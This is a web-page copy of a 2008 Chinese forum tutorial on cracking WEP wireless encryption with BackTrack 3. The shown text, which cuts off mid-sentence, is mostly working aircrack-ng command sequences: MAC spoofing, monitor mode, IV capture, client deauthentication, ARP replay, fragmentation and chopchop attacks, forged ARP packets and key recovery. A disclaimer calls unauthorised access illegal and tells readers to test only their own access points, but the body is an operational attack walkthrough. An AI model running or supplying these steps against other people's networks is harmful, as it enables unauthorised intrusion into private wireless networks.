您好,欢迎访问三七文档
当前位置:首页 > 商业/管理/HR > 项目/工程管理 > 无线网络破解 BT3 BackTrack3破解无线WEP和WPA
中国无线论坛中卫出品AnywhereWLAN!!1BT3破解无线WEP/WPA教程中国无线论坛中卫出品AnywhereWLAN!!2声明:任何不经别人同意而进入别人网络都是非法和不道德的行为。本教程用于学习和交流,如要实验请拿自已的AP开刀!!题记:本人是中国无线论坛的ID“中卫”,无线安全版块是本论坛一个特殊而重要的版块,我们一直非常努力的想把这个板块做好。作为板块现阶段的的一个重点就是无线WEP和WPA的破解内容。我根据各位坛友的教程和自己的理解整理编辑成这篇《BT3破解无线WEP/WPA教程》。由于本人也是初学者,缺乏专业的理论知识,因此文中不免存在理解的偏差甚至错误,希望各位朋友指正。最后希望更多的朋友参与到教程的整理和编辑中,不断把教程修正和完善。如果对教程有任何意见和建议,欢迎各位到论坛提问和交流。谢谢!!中卫08年7月13日中国无线论坛中卫出品AnywhereWLAN!!3开放式WEP破解1.装备:IMBX60笔记本(内置Intel3945无线网卡)、BT3的U盘系统(需用syslinux命令来指定启动BT3的盘符)2.用户名:root密码:toor,进入图形界面:startx。启动BT3后,(启动黑屏:xconf再输入startx)3.加载3945网卡的驱动。打开一个shell输入modprobe–riwl3945卸载原来的网卡驱动输入modprobeipwraw加载可监听的网卡驱动注:不同的网卡有不同的加载方式LINUX驱动是通过模块进行加载的,可以用lsmod来查看机器已加载的模块然后可以通过modinfoipwraw(模块名)来查看所加载驱动模块的版本信息最新的ipwraw的版本是ipwraw-ng-2.3.4-04022008.tar.bz2的。中国无线论坛中卫出品AnywhereWLAN!!4最新的版本需要设置rate为1M设置命令为iwconfigwifi0rate1M这个版本的驱动支持3945无线网卡发射功率得设置,命令如下iwconfigwifi0txpower16(TXPOWER是你想设置的值min=-12andmax=16,单位为dBm)参数on/off可以打开和关闭发射单元,auto和fixed指定无线是否自动选择发射功率。注:降低连接速率可提高建立虚拟连接的成功率和稳定性,提高发射功率可增加发射距离。4.查找目标:可以用airodump-ngwifi0来搜索注:通过扫描获得你要破解的AP的MAC和SSID还有是否有客户端等信息。记录下这些信息后,请关闭此窗口。不然会出现后面建立虚拟连接时信道一直在跳转的情况。我们选择第一个作为目标,channel为11(上图中的CH代表信道)。注:修改自己网卡的MAC地址的命令。输入macchanger–m00:11:22:33:44:55wifi05.激活网卡的Monitor模式并工作在11信道。(加载网卡,激活监听模式,工作在11信道)输入airmon-ngstartwifi011也可用iwconfiwifi0来查看网卡的工作模式和工作信道。中国无线论坛中卫出品AnywhereWLAN!!5可用aireplay-ng-9wifi0测试注入6.输入截取数据包命令(截取11信道的ivs数据包,并保存名为name.ivs)输入命令airodump-ng--ivs-wname-c11wifi0,(--ivs:仅截取ivs数据包,-w:写入文件,-c:截取ivs的信道)(其中name是获取的ivs的保存文件的名字,11是channel值,你根据实际修改)中国无线论坛中卫出品AnywhereWLAN!!6一.有客户端WEP破解1.有客户端,且合法客户端产生大量有效的数据,能直接获得大量IVS。思路:1-6步同上7.直接用aircrack-ng破解第七步:aircrack-ng-n64-bapmacname-01.ivs2.有客户端,合法客户端只能产生少量ivs数据,就需要注入攻击加速产生大量ivs。只要有少量的数据就可能获得arp请求包,则可用arp注入模式的-3模式通过不断向AP发送同样的arp请求包,来进行注入式攻击。思路:1-6步同上7.用aireplay-ng的arp注入方式获得大量的ivs第七步:aireplay-ng-3-bapmac-h合法客户端macwifi0注:这一步可能时间会长一点,因为需要等到ARP。3.有客户端,但是客户端根本不在通信,不能产生ARP包。-3注入模式不成功思路:1-6步同上7.-0冲突模式强制断开合法客户端和ap连接,使之重新连接8.利用-0冲突模式重新连接所产生的握手数据让-3获得有效的ARP从而完成ARP注入第七步:aireplay-ng-3-bapmac-h合法客户端macwifi0中国无线论坛中卫出品AnywhereWLAN!!7第八步:aireplay-ng-010–aapmac-c合法客户端macwifi0中国无线论坛中卫出品AnywhereWLAN!!84.有客户端,并且客户端能产生有效arp数据的另类破解方式前面的步骤一样:输入modprobe–riwl3945输入modprobeipwraw输入airmon-ngstartwifi011现在,只要一个命令就搞定,输入:输入wesside-ng-iwifi0-v01:02:03:04:05:06(此格式的APMAC)。Wesside-ng这个命令其实就是一个-5碎片注入,fragmentation构造注入包,-3arp注入,最后PTW破解这样一个思路。中国无线论坛中卫出品AnywhereWLAN!!9二.无客户端开放式WEP破解思路:1-6步同上因为是无客户端,所以第一步就需要和AP之间建立一个虚拟连接。这是非常关键的一步。为让AP接受数据包,必须使自己的网卡和AP关联。如果没有关联的话,目标AP将忽略所有从你网卡发送的数据包,IVS数据将不会产生。第七步:输入aireplay-ng-10-eapessid-aapmac-hmacwifi0如果回显虚拟伪装连接不成功,不能成功的原因很多,具体有如下几种:1、目标AP做了MAC地址过滤2、你离目标AP物理距离太远3、对方使用了WPA加密5、网卡、AP可能不兼容,网卡没有使用和AP一样的工作频道注:遇有不规则的essid可用引号将essid引起来比如,‘jackchen’。虚拟连接不成功可做如下尝试:1.直接将-e这个参数省略掉2.降低网卡的速率重新进行连接Iwconfigwifi0rate2M参数说明:rate后面跟连接的速率,可以从小往大设置做尝试连接。后面的单位M必须为大写中国无线论坛中卫出品AnywhereWLAN!!10也可以使用命令tcpdump来确认网卡是否已经连接到目标AP上tcpdump-n-e-s0-vvv-iwifi0中国无线论坛中卫出品AnywhereWLAN!!111.第一种破解方式:思路:1-7步同上建立虚拟连接后直接用-2交互攻击模式,这个模式集合了抓包和提取数据,发包注入三种能力。第八步:抓包,提数据和发包攻击aireplay-ng-2-p0841-cff:ff:ff:ff:ff:ff-bapmac-hmymacwifi0发包成功后可得到足够的ivs,然后用aircrack-ng破解。成功后如上图截获了一个可以直接进行注入的数据包,并回显Usethispacket,按y然后开始发包攻击,date飞快涨。当获得足够的ivs以后就可破解了。中国无线论坛中卫出品AnywhereWLAN!!122.第二种破解方式:思路:1-7步同上第八步:利用-5碎片攻击模式获得一个可用的包含密钥是数据文件(xor文件)第九步:然后通过数据包制造程序Packetforge-ng提取xor文件中的PRGA伪造一个arp包,第十步:最后利用交互式攻击模式-2发包攻击。第八步:采用碎片包攻击模式-5,获得一个PRGA数据包(xor文件)。输入aireplay-ng-5-bapmac-hmymacwifi0如顺利,将得到一个可利用的数据包如上图,系统将回显Usethispacket?输入y回车,将得到一个至关重要的xor文件。这一步生成的xor文件将被我们用来产生arp数据包。再输入ls查看当前目录,你将看到刚才生成的一个后缀名为xor的文件。中国无线论坛中卫出品AnywhereWLAN!!13第九步:用数据包制造程序packetforge-ng将上面获得的PRGA数据包伪造成可利用的ARP注入包。其工作原理就是使目标AP重新广播包,当AP重广播时,一个新的IVS将产生,我们就是利用这个来破解。输入packetforge-ng-0-aapmac-hmymac-k255.255.255.255–l255.255.255.255-yname-xor-wmyarp参数说明:-y(filename)是用来读取PRGA的文件-w(filename)将arp包写入文件,我用的文件名是myarp系统回显:Wrotepacketto:mrarp中国无线论坛中卫出品AnywhereWLAN!!14第十步:采用交互模式-2,发包注入攻击。输入aireplay-ng-2–rmyarp-x256rausb0【-r】:从指定文件中读取arp数据包【-x】:定义每秒发送的数据包数量。为避免网卡死机,可选择256,最高不超过1024输入y回车攻击开始中国无线论坛中卫出品AnywhereWLAN!!15这时,前面的抓包窗口上的data将迅速增加。到数据增加到1.5万以上时。第十一步:采用aircrack-ng来进行破解中国无线论坛中卫出品AnywhereWLAN!!163.第三种破解方式:思路:1-7步同上第八步:利用-4的Chopchop攻击模式获得一个可用的包含密钥数据文件(xor文件)第九步:通过数据包制造程序Packetforge-ng提取xor文件中的PRGA伪造一个arp包第十步:最后利用交互式攻击模式-2发包攻击。第八步:采用-4的Chopchop攻击模式获得一个包含密钥数据的xor文件输入aireplay-ng-4-bapmac-hmymacwifi0参数说明:-b:设置需要破解的AP的mac-h:设置用于连接的无线网卡的mac(自己网卡)顺利将得到一个可利用的数据包,按y将利用此数据包生产一个xor文件如上图所示得到一个名为replay_dec-0523-075615的xor文件,中国无线论坛中卫出品AnywhereWLAN!!17第九步:通过数据包制造程序Packetforge-ng提取上面xor文件来伪造一个arp包输入packetforge-ng-0-aapmac-hmymac-k255.255.255.255–l255.255.255.255-yname-xor-wmyarp如上图,成功生成一个名为myarp的可用来注入的arp数据包。第十步:最后利用交互式攻击模式-2发包攻击。输入aireplay-ng-2-rmyarprausb0发现了可利用的myarp的数据包,按y后,立刻注入攻击。Date疯涨注入成功将会获得足够的ivs然后直接用aircrack进行破解中国无线论坛中卫出品AnywhereWLAN!!18注:在破解无客户端的时候经常会遇到有些AP,尝试了各种注入攻击模式都无法成功注入,date一直为0。这时候可以根据下面的四种提示做进一步的尝试。1.移动无线网卡位置让其获得更好的信号强度;2.在注入攻击的过程中尝试多次进行-1虚拟连接;3.在-2交互模式攻击中加入-F参数(自动选择获取的数据包进行注入攻击)如下图所示然后你可以一边去做自己的事,等你忙好了回来的时候说不定date已经涨到几十万了;4.在使用各种注入命令等待获取注入数据包的时候,如果你另外有一台计算机可以让另外一台计算机连接到你要破解的无线AP。在连接过程中当提示输入密码的时候
本文标题:无线网络破解 BT3 BackTrack3破解无线WEP和WPA
链接地址:https://www.777doc.com/doc-4578168 .html